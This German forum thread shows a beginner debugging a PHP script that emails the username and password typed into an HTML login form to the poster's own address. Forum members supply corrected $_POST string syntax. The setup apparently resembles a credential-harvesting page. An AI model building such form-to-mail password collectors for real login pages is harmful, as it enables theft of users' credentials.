• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

$Mail code benötigt

also ich möchte zugeben, dass ich im gegensatz zu anderen hier so gut wie nichts kann!
und nun steh ich vor volgendem problem:
ich hab mir deine links angeguckt durchgelesen und angewendet, da ich natürlich lernfähig bin.
komme nun aber zu dem problem, dass meine php datei nich erkannt wird
folgender fehler:
Fehler: Datei nicht gefunden
Die Dateien unter /C:/Dokumente und Einstellungen/username/Desktop/meinprojeckt/sender.php konnten nicht gefunden werden.
 
Werbung:
also ich möchte zugeben, dass ich im gegensatz zu anderen hier so gut wie nichts kann!
Dann solltest Du mit HTML anfangen, nicht mit PHP.

komme nun aber zu dem problem, dass meine php datei nich erkannt wird
folgender fehler:
Fehler: Datei nicht gefunden
Die Dateien unter /C:/Dokumente und Einstellungen/username/Desktop/meinprojeckt/sender.php konnten nicht gefunden werden.
Wer bringt diese Fehlermeldung? Soll das eine URL sein? Die URLs unter Windows, die auf eine lokale Datei verweisen, sehen anders aus: file:///C:/xxx/termine.html
PHP wird aber, wenn Du Dich über PHP informiert hast, serverseitig ausgeführt. Lokal im Browser kannst Du eine PHP-Datei nicht ausführen. Du brauchst dazu zwingend einen Webserver. Entweder hast Du Webspace, wo das alles schon installiert ist, wenn Du das auf Deinem eigenen PC ausprobieren willst, musst Du alles nötige installieren - am einfachsten geht das mit dem Paket "XAMPP".
 
Werbung:
ja aber ich kann nicht sagen wiso liegt es villeicht an meinem code ??


<?php
$sender = "meine e-mail";
$empfaenger = "meine andere e-mail";
$betreff = "nachricht von $sender";
$mailtext = "$mailtext = "Hallo, soeben hat sich $_POST['username'] mit dem Passwort $_POST['password'] angemeldet.";
mail($empfaenger, $betreff, $mailtext, "From: $sender ");
?>
 
Nein, daran kann es nicht liegen. In der URL sind 2 // hintereinander, das ist nicht erlaubt, ausserdem gehe ich mal stark davon aus, dass deine Datei nicht sender.php.php heißen soll, oder?
 
Werbung:
Guck dir diese Zeile nochmal an.
PHP:
$mailtext = "$mailtext = "Hallo, soeben hat sich $_POST['username'] mit dem Passwort $_POST['password'] angemeldet.";
Da sollte dir was dran auffallen.
 
so leute es hat sich was getan : ich guckte mir alle links von euch an lernte dazu und kam zu dem ergebniss..



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtmll/DID/xhtmll-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
</head>


<body>


<?

$empfaenger = "[email protected]" ;
$betreff = "TEST";
$text = "TEST";
§sender = "TEST";


mail($empfaenger, $betreff, §text, "From: " .$sender);
?>

</body>
</html>



diesmal niergenswo geklaut ^^
einziger nachteil : es geht nicht
 
Werbung:
Schau dir dein gepostetes Script nochmal an, und beachte, dass § nicht gleich $ ist.

Edit:

aber keines der beiden skrips klappt
Was ist das denn für eine Ansage? Ohne mehr Informationen kann man nur raten. Fehlermeldung? Link zur Seite?
 
habe ich schon korrigiert und tada es klappt thx euch allen ....
das wars aber noch nicht
....
jetzt bekomme ich die mail aber vorerst steht ja nur test drin ...
frage: wie bekomme ich jetzt die dateien von dem loginfeld (in einem html dokument, das ich hochgeladen habe) ind den mailsender ??

hab es mit dem skript probiert :

$text = "Hallo, soeben hat sich $POSt['username'] mit dem Passwort $post['password'] angemeldet.";


klappt aber leider nicht!!
 
Werbung:
So ein Server schaut sich den Code nicht einfach an und denkt sich "Ach, er wird schon den richtigen Code meinen.".

Du musst auch auf die Kleinigkeiten achten. zB sollte es $_POST heissen und nicht $POST oder $poSt.

Lerne doch erst einmal HTML etc. wie efchen schon sagte, PHP ist wirklich ein größeres Kaliber.
 
ja ich weiß ist mir ja auch klar das ich euch mi den ganzen kleinichkeiten auf den sack geh

ok....nun hab ich so gemacht wie du sagtes undbekomme folgende mail wen ich es öffne :

Hallo, soeben hat sich Array ['username'] mit dem Passwort Array ['password'] angemeldet
was ist Array ??
 
Werbung:
Der Ausdruck $_POST['username'] ist vermutlich zu komplex, um von PHP innerhalb eines Strings korrekt ausgewertet zu werden. Du könntest geschweifte Klammern darum setzen oder Konkatenieren:

PHP:
echo "Username: {$_POST['username']}<br />";

// bzw.
echo "Username: " . $_POST['username'];

Mein PHP schmeißt hier übrigens sofort 'ne Fehlermeldung:

PHP:
$text = "Hallo, soeben hat sich $_POST['username'] mit dem Passwort $_POST['password'] angemeldet.";

echo $text;

Code:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in index.php on line 3

Und dein ewiges Gepushe nervt extrem.

Edit: Dokuseite dazu: http://www.php.net/manual/en/language.types.string.php#language.types.string.parsing
 
Zuletzt bearbeitet:
habs getestet und es klappt nicht

um meine lage mal klarzustellen, da ich glaube etwas unverstäntlich geschrieben zu haben :


Ich habe momentan 2 Dateien die ich auf einem Hoster mit dem link : Free Webspace mit PHP und MYSQL kostenlos | CwCity.de
hochgeladen habe !
1.Datei: Mein ganz normales Html-Skript mit 2 Textboxen. eine im ganznormalen text style und die ande im passwort intype
2.Datei: Der sender.php zum verssenden des inhalte der beiden textboxen in der ersten datei (das html-skript)


Ich habe ein POBLEM bei der 2.Datei, unzwar :


Wie kann ich den Inhalt der beiden Textboxen aus der 1.Datei Über den Sender.php (die 2.Datei) an meine E-mailadresse schicken lassen ???? Sozusagen muss ich nurnoch wissen wie ich den Inhalt der Beiden textboxen in die e-mail importiere!
 
mermshaus hat deine Frage im Grunde genommen schon beantwortet. Wenn du dir seinen Beispielcode mal ansiehst, könntest du ja mal selbst versuchen dein Script entsprechend abzuändern oder mal zu googlen.

Von dir muss auch etwas kommen. Wir helfen dir gerne, erledigen aber nicht deine Arbeit.
 
Werbung:
Du hast meiner Meinung nach immer noch nicht versucht ein Tutorial durchzuarbeiten. Das was mermshaus dir beibringen will kommt vermutlich spätestens nach dem 3. Kapitel eines PHP-Buches dran!

Eine superglobale Variable kann von PHP nicht innerhalb eines Strings mit doppelten Anführungszeichen eingefügt werden.
Das heisst du musst entweder den String für die Variable unterbrechen:
PHP:
$mailtext = "Hallo, soeben hat sich ".$_POST['username']." mit dem Passwort ".$_POST['password']." angemeldet.";
oder die Variable innerhalb der Zeichenkette mit {} kennzeichnen:
PHP:
$mailtext = "Hallo, soeben hat sich {$_POST['username']} mit dem Passwort {$_POST['password']} angemeldet.";
Das hättest du dir wirklich auch selbst erarbeiten können!
 
Zurück
Oben